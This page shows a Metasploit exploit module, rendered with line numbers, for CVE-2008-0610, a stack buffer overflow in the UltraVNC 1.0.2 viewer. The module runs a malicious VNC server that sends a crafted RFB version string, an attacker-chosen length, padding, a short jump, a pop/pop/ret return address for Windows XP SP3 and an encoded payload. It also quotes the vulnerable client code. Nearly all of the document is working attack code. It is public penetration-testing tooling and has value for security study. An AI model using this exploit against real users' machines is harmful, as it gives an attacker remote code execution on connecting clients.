Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb
19593 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.

18


19
          If a malicious server responds to a client connection indicating a minor

20
          protocol version of 14 or 16, a 32-bit integer is subsequently read from

21
          the TCP stream by the client and directly provided as the trusted size for

22
          further reading from the TCP stream into a 1024-byte character array on

23
          the stack.

24
        },

25
        'Author' => 'noperand',

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2008-0610' ],

29
          [ 'OSVDB', '42840' ],

30
          [ 'BID', '27561' ],

31
        ],

32
        'DefaultOptions' => {

33
          'EXITFUNC' => 'thread',

34
        },

35
        'Payload' => {

36
          'Space' => 500,

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          [ 'Windows XP SP3',	{ 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2

41
        ],

42
        'Privileged' => false,

43
        'DisclosureDate' => '2008-02-06',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])

56
      ]

57
    )

58
  end

59


60
  def on_client_connect(client)

61
    return if ((p = regenerate_payload(client)) == nil)

62


63
    sploit = rand_text_alpha(1100)	# junk, could be more efficient here

64
    sploit << "\x00\x04\x00\x00" 	 	# value to get around a write

65
    sploit << rand_text_alpha(12)	 	# random junk

66
    sploit << "\xEB\x06" << make_nops(2)	# short relative jump

67
    sploit << [target.ret].pack('V')	# pop/pop/ret (default is in vncviewer.exe)

68
    sploit << payload.encoded

69


70
=begin

71
    We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").

72
    - These bytes are read directly by a call to ReadExact() with a size of 12.

73


74
    ...

75
    if (m_minorVersion == 14 || m_minorVersion == 16)

76
    {

77
      int size;

78
      ReadExact((char *)&size,sizeof(int));

79
      char mytext[1024]; //10k

80
      ReadExact(mytext,size);

81
      mytext[size]=0;

82
    ...

83


84
    If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.

85
    We then append our data.

86
=end

87
    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit

88


89
    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")

90
    client.put(sploit)

91
    handler(client)

92
    service.close_client(client)

93
  end

94
end

95


96